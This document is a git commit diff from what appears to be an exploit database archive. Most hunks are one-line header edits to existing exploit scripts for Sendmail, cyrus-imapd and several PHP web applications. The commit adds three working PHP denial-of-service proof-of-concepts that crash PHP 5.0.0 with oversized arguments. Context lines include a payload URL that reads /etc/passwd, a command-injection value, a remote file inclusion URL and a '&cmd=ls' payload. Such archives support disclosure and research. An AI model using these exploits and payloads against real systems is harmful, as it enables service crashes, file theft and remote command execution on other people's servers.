DB: 2016-08-31
3 new exploits Too many to list!
This commit is contained in:
parent
760d823bc8
commit
1f0c845486
35 changed files with 7863 additions and 7793 deletions
|
@ -1,4 +1,4 @@
|
|||
#!/bin/bash
|
||||
#!/bin/bash
|
||||
#
|
||||
# INTELLINET IP Camera INT-L100M20N remote change admin user/password
|
||||
#
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
|
||||
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
|
||||
# Date: 28/08/2016
|
||||
# Exploit Author: Rahul Raz
|
||||
# Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
# redsand@blacksecurity.org
|
||||
# Sendmail 8.13.5 and below Remote Signal Handling exploit
|
||||
|
@ -295,3 +295,4 @@ xpl=substr(xpl,atom,len(xpl))
|
|||
"""
|
||||
|
||||
# milw0rm.com [2006-07-21]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
/*
|
||||
/*
|
||||
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
|
||||
*
|
||||
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
|
||||
|
@ -106,3 +106,4 @@ int main(void)
|
|||
}
|
||||
|
||||
// milw0rm.com [2006-07-18]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python
|
||||
# -*- coding, latin-1 -*- ######################################################
|
||||
# #
|
||||
# DESCRIPTION #
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/ruby
|
||||
#!/usr/bin/ruby
|
||||
#
|
||||
# cyrus-imapd pop3d exploit
|
||||
# by bannedit
|
||||
|
@ -85,3 +85,4 @@ system(cmd)
|
|||
sock.close
|
||||
|
||||
# milw0rm.com [2006-07-21]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
<?php
|
||||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 domxml_open_file() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
<?php
|
||||
<?php
|
||||
#############################################################################
|
||||
## PHP 7.0 Object Cloning Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
<?php
|
||||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 simplexml_load_file() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
|
|
15
platforms/php/dos/40313.php
Executable file
15
platforms/php/dos/40313.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 imap_mail() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("imap")) die("You need imap extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
imap_mail($str,'','');
|
||||
?>
|
14
platforms/php/dos/40314.php
Executable file
14
platforms/php/dos/40314.php
Executable file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
|
||||
|
||||
hw_docbyanchor(0,0);
|
||||
?>
|
15
platforms/php/dos/40315.php
Executable file
15
platforms/php/dos/40315.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 html_doc_file() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
html_doc_file($str);
|
||||
?>
|
|
@ -1,4 +1,4 @@
|
|||
#==================================================================================================
|
||||
#==================================================================================================
|
||||
#!/usr/bin/perl
|
||||
use IO::Socket;
|
||||
#==================================================================================================
|
||||
|
@ -249,3 +249,4 @@ for ($k=0;$k<=$#ARR;$k++)
|
|||
#========================================================================================================
|
||||
|
||||
# milw0rm.com [2006-07-18]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
|
@ -137,3 +137,4 @@ echo "Exploit failed...";
|
|||
?>
|
||||
|
||||
# milw0rm.com [2006-07-18]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
|
||||
echo "by rgod rgod@autistici.org\r\n";
|
||||
|
@ -146,3 +146,4 @@ echo "exploit failed...";
|
|||
?>
|
||||
|
||||
# milw0rm.com [2006-07-21]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "X7 Chat <=2.0.4 'old_prefix' blind SQL injection / privilege escalation exploit\r\n";
|
||||
echo "by rgod rgod@autistici.org\r\n";
|
||||
|
@ -217,3 +217,4 @@ else
|
|||
?>
|
||||
|
||||
# milw0rm.com [2006-07-24]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
|
@ -258,3 +258,4 @@ echo "----------------------------------------------------------\n";
|
|||
?>
|
||||
|
||||
# milw0rm.com [2006-07-30]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
########################### www.system-defacers.org ###############
|
||||
########################### www.system-defacers.org ###############
|
||||
# Found By CeNGiZ-HaN cengiz-han@system-defacers.org
|
||||
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
|
||||
############################################################################
|
||||
|
@ -22,3 +22,4 @@
|
|||
##############################################################################
|
||||
|
||||
# milw0rm.com [2006-07-31]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
+--------------------------------------------------------------------
|
||||
+--------------------------------------------------------------------
|
||||
+
|
||||
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
|
||||
+
|
||||
|
@ -53,3 +53,4 @@ EAR.php/&cmd=ls
|
|||
+-------------------------[ E O F ]----------------------------------
|
||||
|
||||
# milw0rm.com [2006-07-31]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
+--------------------------------------------------------------------
|
||||
+--------------------------------------------------------------------
|
||||
+
|
||||
+ TSEP 0.9.4.2
|
||||
+
|
||||
|
@ -45,3 +45,4 @@
|
|||
+-------------------------[ E O F ]----------------------------------
|
||||
|
||||
# milw0rm.com [2006-08-01]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
+--------------------------------------------------------------------
|
||||
+--------------------------------------------------------------------
|
||||
+
|
||||
+ PHPAuction 2.1 Remote File Inclusion
|
||||
+
|
||||
|
@ -46,3 +46,4 @@
|
|||
+-------------------------[ E O F ]----------------------------------
|
||||
|
||||
# milw0rm.com [2006-08-01]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#=================================================================
|
||||
#=================================================================
|
||||
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
|
||||
#================================================================
|
||||
# |
|
||||
|
@ -36,3 +36,4 @@
|
|||
=================================================================
|
||||
|
||||
# milw0rm.com [2006-08-01]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
TinyPHPForum 3.6 Admin Maker<br>
|
||||
TinyPHPForum 3.6 Admin Maker<br>
|
||||
By SirDarckCat from elhacker.net
|
||||
|
||||
<FORM method=post enctype="multipart/form-data">
|
||||
|
@ -17,3 +17,4 @@ document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"u
|
|||
</script>
|
||||
|
||||
# milw0rm.com [2006-08-02]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
Script: TSEP <= 0.942
|
||||
Script: TSEP <= 0.942
|
||||
URL: www.tsep.info
|
||||
Discovered: beford <xbefordx gmail com>
|
||||
Comments: "register_globals" must be enabled duh.
|
||||
|
@ -23,3 +23,4 @@ POC:
|
|||
http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/?
|
||||
|
||||
# milw0rm.com [2006-08-02]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
|
||||
echo "execution exploit\n";
|
||||
|
@ -306,3 +306,4 @@ else echo ("specify an action [1-4]...");
|
|||
?>
|
||||
|
||||
# milw0rm.com [2006-08-03]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
|
||||
echo "administrative credentials disclosure exploit\n";
|
||||
|
@ -260,3 +260,4 @@ echo "exploit failed...";
|
|||
?>
|
||||
|
||||
# milw0rm.com [2006-08-07]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
SQLiteWebAdmin
|
||||
SQLiteWebAdmin
|
||||
http://sourceforge.net/projects/sqlitewebadmin
|
||||
|
||||
SQLiteWebAdmin is a simple PHP program for administrating
|
||||
|
@ -19,3 +19,4 @@ SirDarckCat
|
|||
elhacker.net
|
||||
|
||||
# milw0rm.com [2006-08-07]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
|
||||
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
|
||||
$$
|
||||
$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
|
||||
$$ Script site: http://sapid.sourceforge.net/
|
||||
|
@ -28,3 +28,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root
|
|||
#Pozdro dla wszystkich ;-)
|
||||
|
||||
# milw0rm.com [2006-08-07]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
|
||||
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
|
||||
# Google Dork:
|
||||
# Date: 25/06/2015
|
||||
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
|
||||
|
@ -115,3 +115,4 @@ The attacker can now log as superlibrarian.
|
|||
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
|
||||
Alice needs to have access to the OPAC interface and to have permissions to create public lists.
|
||||
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
'''
|
||||
'''
|
||||
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
|
||||
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
|
||||
# Date: 2016-08-26
|
||||
|
|
|
@ -16,3 +16,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
|
|||
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
|
||||
|
||||
# milw0rm.com [2008-10-12]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/perl
|
||||
#!/usr/bin/perl
|
||||
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
|
||||
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
|
||||
#
|
||||
|
@ -36,3 +36,4 @@ do
|
|||
} while (true);
|
||||
|
||||
# milw0rm.com [2006-07-20]
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
"""
|
||||
"""
|
||||
# Exploit Title: Goron Web Server 2.0 - Multiple Vulnerabilities
|
||||
# Date: 26/08/2016
|
||||
# Exploit Author: Guillaume Kaddouch
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
/*
|
||||
/*
|
||||
|
||||
by Luigi Auriemma
|
||||
|
||||
|
@ -272,3 +272,4 @@ void std_err(void) {
|
|||
}
|
||||
|
||||
// milw0rm.com [2006-07-31]
|
||||
|
Loading…
Add table
Reference in a new issue